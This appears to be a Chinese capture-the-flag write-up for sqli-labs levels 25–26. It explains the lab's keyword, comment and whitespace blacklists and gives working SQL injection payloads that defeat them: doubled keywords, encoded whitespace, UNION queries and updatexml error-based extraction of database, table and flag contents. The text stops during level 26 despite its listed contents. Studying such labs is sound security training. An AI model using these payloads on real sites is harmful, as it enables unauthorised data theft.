当前位置：首页 > news >正文

sqli-labs过关解析（25-26a关附带源码解析）

news 2026/5/11 21:01:42

小歇了一天，今天继续给大家带来sqli-labs靶场的解析文章；
本文主要梳理 sqli-labs 第25到29关的过关思路，简单分析源码中的过滤机制、闭合方式以及常见绕过方法，涉及布尔盲注、过滤函数逆向、注入语句构造和自动化爆破等基础知识点，整体偏向实战操作逻辑。

文章目录

- sqli-labs第25关 — GET型or and过滤注入
- - 绕过方法
  - - 双写绕过
    - 符号替代
- sqli-labs第25a关 — GET型or and过滤int型注入
- sqli-labs第26关 — GET型过滤进阶注入
- - 绕过方法
  - - A. 双写绕过逻辑词 (OR / AND)
    - B. URL编码绕过空格
    - C. 绕过注释符
    - D. 报错注入
- sqli-labs第26a关 — 布尔盲注
- - 尝试union联合注入
  - 布尔盲注
- 总结

sqli-labs第25关 — GET型or and过滤注入

默认页面：（看来时过滤了or和and这两个关键词：）

还是老样子，先看源码：

blacklist() 函数：试图通过preg_replace过滤掉敏感关键词：

绕过方法

双写绕过

绕过 OR：使用oorr
绕过 AND：使用anandd
绕过 ORDER BY：注意 ORDER 中包含 OR，会被过滤成 DER。因此需要写成oorrder by

符号替代

在 SQL 中，除了单词外，还可以使用符号来表示逻辑运算：

AND 可以替换为&&(在 URL 中需要 URL 编码为%26%26)
OR 可以替换为||

所以，我们可以尝试一下上述方法：

# 测试回显?id=1' oorrder by 1,2,3 -- da ?id=1'oorrder by1,2,3,4 -- da // 报错,只要三个回显# 测试数据库 information的 or 也要双写?id=-1' union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata -- da # 查表 得到flags ?id=-1'unionselect1,2,group_concat(table_name)from infoorrmation_schema.tables wheretable_schema='ctfshow'-- da# 查列 得到flag4s?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema='ctfshow' aandnd table_name='flags' -- da # 详细字段 得到ctfshow{0ff85553-0d32-4b3f-ab9b-a1446ee272d3} ?id=-1'unionselect1,2,group_concat(flag4s)from ctfshow.flags -- da

结果如下：

sqli-labs第25a关 — GET型or and过滤int型注入

查看源码：

其实就变了个闭合方式而已：整型闭合

默认页面如下：

直接上payload：

# 测试回显?id=1oorrder by1,2,3 -- da ?id=1oorrder by1,2,3,4 -- da // 报错,只要三个回显# 测试数据库 information的 or 也要双写?id=-1 unionselect1,2,group_concat(schema_name)from infoorrmation_schema.schemata -- da# 查表 得到flags?id=-1 unionselect1,2,group_concat(table_name)from infoorrmation_schema.tables wheretable_schema='ctfshow'-- da# 查列 得到flag4s?id=-1 unionselect1,2,group_concat(column_name)from infoorrmation_schema.columns wheretable_schema='ctfshow'aandndtable_name='flags'-- da# 详细字段 得到ctfshow{df6545e9-5b82-4541-ab28-138c946dee4d}?id=-1 unionselect1,2,group_concat(flag4s)from ctfshow.flags -- da

得到flag：

sqli-labs第26关 — GET型过滤进阶注入

直接查看源码：

唯一的区别是多过滤了几个字符：

过滤对象	正则表达式	影响
逻辑词	`/or/i`,`/and/i`	无法直接使用 OR、AND（不区分大小写）。
注释符	`[#]`,`[--]`,`[\/\*]`	封杀了`#`、`--`和`/* */`。这意味着不能通过注释截断 SQL 后半部分的单引号。
空格	`[\s]`	匹配任何空白字符（空格、制表符、换页符等），并将其直接删除。
斜杠	`[\/\\\\]`	过滤了正斜杠`/`和反斜杠`\`。

绕过方法

A. 双写绕过逻辑词 (OR / AND)

依然可以采用“双写绕过”，因为preg_replace只执行一次替换。

OR→ \rightarrow→oorr或者||
AND→ \rightarrow→anandd或者%26%26

B. URL编码绕过空格

由于\s过滤了常见的空格和控制符，我们需要寻找 MySQL 能够识别但正则未定义的替代方案。

常用的技巧包括：特殊编码(使用 URL 编码的控制字符)

%a0(不换行空格) —— 在某些环境下有效。
- 推荐：%0a(换行)、%0b(垂直制表)、%0c(换页)、%0d(回车)，%09

C. 绕过注释符

既然无法用#或--注释掉末尾的单引号，必须闭合它。

原句：WHERE id='$id' LIMIT 0,1
Payload 思路：id=1' [你的注入语句] '1

or'1'='1

这样末尾的' LIMIT 0,1会变成字符串的一部分或被逻辑运算连接。

D. 报错注入

我们利用updatexml()或extractvalue()配合报错，并使用%0a代替空格，用oorr绕过 or：

根据上述原理，我们很容易可以构造出payload：

# 测试payload?id=1'%0a||'1'='1# 查数据库?id=1'anandd(updatexml(1,concat(0x7e,database(),0x7e),1))anandd'1?id=1'%0a||(updatexml(1,concat(0x7e,database(),0x7e),1))anandd'1?id=1'%0a||(updatexml(1,concat(0x7e,database(),0x7e),1))||'1?id=1'anandd|(updatexml(1,concat(0x7e,database(),0x7e),1))||'1

此时的查询语句为：SELECT * FROM users WHERE id='1'||(updatexml(1,concat(0x7e,'security',0x7e),1))and'1' LIMIT 0,1

# 查表 得到flags?id=1' || updatexml(1, concat(0x7e, (SELECT (group_concat(table_name)) FROM (infoorrmation_schema.tables) WHERE (table_schema='ctfshow'))) ,1) || '1'='1# 查列?id=1'||updatexml(1,concat(1,(SELECT (group_concat(column_name)) FROM (infoorrmation_schema.columns) WHERE (table_schema='security' %26%26 table_name = 'users'))) ,1) || '1'='1# 得到flag ctfshow{04327ac9-4178-4f98-b2f8-56dc342?id=1' || updatexml(1,(select (flag4s) from (ctfshow.flags)),1) || '1'='1# 获取第 30 个字符之后的内容 8-56dc342fb56d}?id=1'||updatexml(1,concat(0x7e,(select(substr(flag4s,30))from(ctfshow.flags))),1)||'1'='1// 用mid函数也行 ?id=1'||updatexml(1,concat(0x7e,(select(mid(flag4s,31,31))from(ctfshow.flags))),1)||'1'='1